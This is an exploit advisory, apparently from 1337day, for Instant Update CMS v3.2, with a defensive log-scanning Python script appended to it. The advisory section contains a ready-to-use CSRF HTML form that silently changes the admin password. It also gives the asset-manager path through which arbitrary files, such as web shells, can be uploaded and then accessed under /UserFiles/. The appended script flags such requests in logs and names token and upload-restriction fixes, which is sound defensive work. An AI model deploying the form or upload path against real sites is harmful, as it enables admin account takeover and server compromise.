
Instant Update CMS v3.2 Arbitrary File Upload/CSRF Vulnerabilities

Author: AtT4CKxT3rR0r1ST, Published: 01-06-2012

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.cubescripts.com/cms-script.php

#######################################################################

===[ Exploit ]===


CSRF [Change Admin Password]
=============================

<html>
<body>

<form method="POST" name="form1" action="http://SITE/manage/savechngdpasswd.php">
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="Password"/>
<input type="hidden" name="image.x" value="33"/>
<input type="hidden" name="image.y" value="11"/>
<input type="hidden" name="image" value="edit"/>
</form>

</body>
</html>


Remote Arbitrary File Upload
================================


http://SITE/manage/scripts/assetmanager/assetmanager.php?ffilter=media

Your File

http://SITE/UserFiles/

#######################################################################
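
A defender-side check for the two issues above, added here as an example (it is not part of the original advisory or of the CMS): it scans web access logs for password-change POSTs that arrive from another origin and for script files requested from the upload directory. Only the three paths come from the advisory; the combined log format, the host name cms.example, the extension list and the idea that uploads are POSTed to assetmanager.php are assumptions.

```python
import re
from urllib.parse import urlsplit

# Paths below come from the advisory; the log format, host names and the
# extension list are assumptions made for this example.
PASSWD_PATH = "/manage/savechngdpasswd.php"
UPLOAD_PATH = "/manage/scripts/assetmanager/assetmanager.php"
USERFILES = "/UserFiles/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.I)

# Apache/nginx "combined" access-log format.
LINE = re.compile(
    r'\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"')

def scan(lines, site_host):
    """Return (line_number, finding) tuples for requests worth reviewing."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        path = urlsplit(m["url"]).path
        ref_host = urlsplit(m["referer"]).hostname  # None when Referer is "-"
        if m["method"] == "POST" and path == PASSWD_PATH and ref_host != site_host:
            # Password change submitted from another origin or with no Referer.
            findings.append((n, "cross-site password change"))
        elif m["method"] == "POST" and path == UPLOAD_PATH:
            findings.append((n, "asset manager upload"))
        elif path.startswith(USERFILES) and SCRIPT_EXT.search(path):
            # Server-side script fetched from the directory uploads land in.
            findings.append((n, "script requested from upload directory"))
    return findings

# Constructed log lines for illustration, not taken from a real server.
SAMPLE = [
    '198.51.100.7 - - [01/Jun/2012:10:00:01 +0000] "POST /manage/savechngdpasswd.php HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jun/2012:10:00:09 +0000] "POST /manage/savechngdpasswd.php HTTP/1.1" 302 0 "http://cms.example/manage/" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jun/2012:10:02:00 +0000] "POST /manage/scripts/assetmanager/assetmanager.php?ffilter=media HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jun/2012:10:02:05 +0000] "GET /UserFiles/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jun/2012:10:02:07 +0000] "GET /UserFiles/x.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, what in scan(SAMPLE, "cms.example"):
        print(n, what)
```

The Referer comparison is a log-review heuristic only; the fix on the application side is a per-session anti-CSRF token on the password form and server-side restriction of what the asset manager accepts and where it stores it.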


# 1337day.com [2012-06-01]
